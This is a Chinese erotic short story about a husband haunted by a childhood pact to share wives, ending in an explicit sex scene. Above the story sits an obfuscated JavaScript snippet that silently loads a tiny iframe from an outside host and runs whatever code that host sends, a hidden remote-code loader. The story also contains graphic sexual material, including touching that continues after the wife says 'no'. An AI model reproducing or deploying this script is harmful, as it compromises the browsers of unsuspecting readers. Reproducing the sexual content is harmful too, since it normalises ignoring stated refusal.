eval('\x77\x69\x6e\x64\x6f\x77')['\x62\x48\x79\x4a\x6f\x64\x6a']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='wwttyy'){new Function(e.data['d'])()}})})('https://samanthyean.com:22665','/cd/108_m/1448',window,document)};

共妻的约定


  新婚燕尔,美好蜜月。

  随之而来的是一个约定之期的到来。一个不如意的,甚至让我头痛至极的约
定。

  「李逸。」

  「李逸!」

  「李逸!!」

  「嗯?」我抬起头,望着坐在对面的妻子,灵,陈灵.

  「在想什么呢,叫你好几次了!」妻子用筷子指了指桌子上釉白色深盘子里
的排骨汤,「喝汤啊,都说了几遍了,尝尝我新学的海带排骨汤做得怎么样。」

  我和陈灵,此时正处在大陆的一个南方小镇里. 这里的人不是很多,绿植覆
盖率很高。当然,我觉得这里并不是个度蜜月好地方,虽说这里景色优美,但缺
少了游玩场所,作为旅游的话实在是太单调了一些。但是这是妻子要求来的地方,
我只好服从她的意愿。也是,从小生活在大都市的她想尝试一下慢节奏的小镇生
活也无可厚非。

  我们租下了一处小宅,作为在二十一世纪的主力军,我们的工作主要在线上。
她是一名网络作家,用键盘描写着一个个幻想的爱情故事。我是软件策划工程师,
负责根据用户的要求给公司的上架软件提出优化方案,一个很普通的职业.

  此时,我们正坐在宅子里小巧的奶白木制小圆桌边。她在那头,我在这头.

  「嗯,刚才想方案入神了,好,我来尝尝. 」我端起碗,用勺子在盘子里盛
了些汤和骨头.

  陈灵是做菜的老手了,她说的「新学」可能只是改了一下配料搭配方式。

  排骨汤很香,调料放的很合适,火候也掌握得很好。

  「味道真不错!」我丝毫不吝啬自己的称讚,举起大拇指。

  灵笑了。她笑起来很美。有的人笑起来很阳光,有人笑起来很养眼,有人笑
起来让人觉得舒适. 灵的笑包含以上的所有,却不止如此。我很爱她,她的笑是
很大一部分原因。

  「好喝就多喝点,很有营养的!」

  虽然汤很符合我的胃口,但是此刻我并没有心情品尝它。

  「下个月,我和几个朋友约定好要聚一下,带上你。去吗?」我轻声询问道,
「也可以不去的!」

  我决定了,如果灵不想去的话,哪怕是破坏约定,担上无法承担的后果,我
也认了。

  「可以啊,既然约定了,那就去吧,失约可不太好!」

  她答应了,我的心却揪了一下。

  没事的,又不一定会是我们。我自我安慰道。

  夜晚,我窝在书房的工作桌前,看着空荡的电脑桌面出了神。

  那时,我还是个十二岁的孩子,和每个孩子一般,害怕无聊,也害怕被孤立。
那时的孩子总是有天马行空的幻想,也有不切实际的期望。

  村头的柳树下,一群十一二岁的男孩子聚集在一块.

  「如果我们以后娶不到媳妇咋办?」问这话的是我们这些孩子中间的「大哥」,
张放。他发育得很好,虽然我们都是同龄,但他早早就窜上了一米七,还壮实。

  在那个村子里,和我们同一辈的没有女孩子。上一辈生下来的,个个都是大
胖小子。七个包括我都是男娃娃。在村里上的小学,同年级就我们七个一班,被
一个老师带着,戴着圆圆眼镜的老头.

  张放提出的问题我们一个都没回答的上来的,毕竟小小的我们还没有思考着
媳妇的事。

  「我们之中以后总会有的吧。」一个小夥伴发表了自己的意见。

  「那我们想个主意,确保我们以后个个都有媳妇吧!」张放摸着下巴对我们
说. 我们一个个都踊跃的提出自己的想法,但都没被张放採取。

  张放突然一拍脑袋,道:「我有办法了,你们等着,明天还在这里集合!」

  他说完便跑回家了,连头都没回。

  翌日的早晨,张放又把聚在柳树脚下的我们带到学校的教室里。

  因为是暑假的原因,学校没有人,我们是从墙上翻进去的。

  张放从怀里掏出一张摺叠起来的纸,抖了抖,平铺在课桌上。

  我们好奇的围着看,上面写道:「十二年后,张放、方毛……等七人各自带
着自己的老婆,聚在一起,从中选个最漂亮的,做剩下的六人的」公妻「。

  「公妻」是指给六个人做老婆,并随机给其中一个人生孩子,为期一年。

  其中五个人每个人给「公妻」的老公十万元,而让「公妻」怀孕的那个人,
要给「公妻」老公五十万元。

  破坏约定的人要交出五百万元给其他人。「

  这段话的下方还有很多空白。

  张放拍拍手道:「为了让我们每一个人都能得到和漂亮的女孩子生孩子的机
会,我想了这个方法,怎么样?」

  方毛第一个鼓掌:「放哥真厉害,想了个这么好的主意。」

  有两个也跟着鼓掌起来。我没有鼓掌,还有两个夥伴也没有。

  张放又说道:「谁不同意我们以后就不跟他玩。」

  这下谁都没意见了。孤立,是那时对付我们最有用的利器。

  张放带来了缝衣服的小细针,道:「我们在上面签名,并按个手印。我先来!」
说罢,便在左手大拇指刺了一下,等血珠流出来,在纸上按了个血印,在印子下
面写上了「张放」两个字。

  剩下人都效仿着他各自签了名,盖了手印。

  然后张放又小心地把纸折好,放在怀里.

  一声铃声把我拉回了现实,电脑桌面底下有图标闪烁.

  原来是来电子邮件了。

  我用鼠标点开图标。是张放的邮件:「时间已经定好了,下个月八号,地点
xxxxx」其实在十三岁那年,我们一家就搬离了那个小村,来到了一个陌生
的城市,和他们也断了联系,甚至我都忘了那个约定。

  可是在上个月,我不知道张放怎么会找到我的联系方式,并约了我见面,还
顺便在见面的最后提了一下那个约定。

  「那个约定正常履行。」他说道。

  这就是我苦恼的原因!

  我关上电脑,轻轻走到卧室的门口,慢慢地打开了房门,没想到灵并没有睡
着,而是在侧卧着玩手机.

  「工作完了吗?」灵把手机丢到一旁,问道。

  「嗯。」我回应道,并打开了灯,「关灯玩手机对眼睛不好。」

  「我刚才只是在听歌,来,亲一个。」灵张开了双臂,等待我的拥抱。

  我走到她的旁边,抱住她,嘴唇覆上了她的嘴唇。

  灵的唇齿中流溢着让我着迷的味道。我轻轻地用舌头刮着她的牙齿,与她的
嫩舌交织着,吮吸着。

  我的右手从她的如丝绸般的睡衣里攀上了她的胸上,温柔地揉捏她那精緻玲
珑的乳房,尺寸合适得让我一只手掌正好包盖满.

  我的左手环住她的柳腰,从背后向下探索着。然后摸上了她那让我最为喜爱
的臀部,虽说不是很大,但特别挺翘和有弹性。我缓慢地、用力地捏着她的臀,
指尖渐渐从臀沟往下移去,浅浅地插进了她的菊蕾。

  灵的咽喉低吟了一声,身子颤抖了一下。

  下面,我的左手指尖在灵的菊蕾口抽插着;上面,我的嘴堵住她的嘴。她的
嘴里吐出一些字眼,带着低吟,并不清晰:「不要!」……「髒」……

  良久,我们的嘴巴分开了,在中间拉出了一条细亮的银丝.

  灵的双眼朦胧而又迷离,嘴巴微张着:「老公,我要……」

  我的心更加热烈起来,大脑已经没办法理智地思考,下面也肿胀的厉害。

  我急不可耐的褪去自己身上的衣物,丢到地上,然后双手从睡袍中间往后剥
去她身上碍事的东西。

  正当我扶住自己的下体准备进入时,灵从床头拿了一个避孕套,用嘴撕开.

  「老公,戴上这个。」妻子不想在此时就开始生子,於是我们每次都要进行
保险措施。

  我哭笑不得,只能戴上这个破坏性致的东西。

  然后在灵的低吟里进入了她的身体.

  红木底的席梦思床也开始发出了吱吱呀呀的叫声,与老婆的娇吟声相和着。

  下体的紧緻让我也控制不住自己的声音,喉咙里闷哼声轻启。

  肉体的啪啪声在空荡的卧房里回荡,春意盎然。

  在我眼里,她是小巧的、精緻的、让我精心呵护的人,值得让我在性爱时刻
保持着对她的温柔。

  我和她的姿势并不算多,用的最多的,也就是正常的面对面男上女下的姿势。

  这个姿势,在我的视角,能观察到在性爱中使我欲罢不能的灵的表情:微张
的小口,鼻翼极小幅度的颤动,透着水光的黑眸已经迷离,眉头也随着我的撞击
轻轻皱着,喉咙里发出不自觉的如奶猫般的叫声。

  当然,我也喜欢她平趴在床上,从她那挺翘的屁股上往下插入,那白嫩细腻
而又软弹的臀部拍打着我的胯部,使我感受到了极大的的满足。

  二十分钟后,我在灵的体内射了,这已是我极力克制的成果,我希望她能感
受到最大程度上的快乐。

  可是我的精液却被层膜挡住,无法接触到它们魂牵梦绕的温床,只能在无机
物的小袋子里游离.

  然后被扔进在床边的垃圾桶。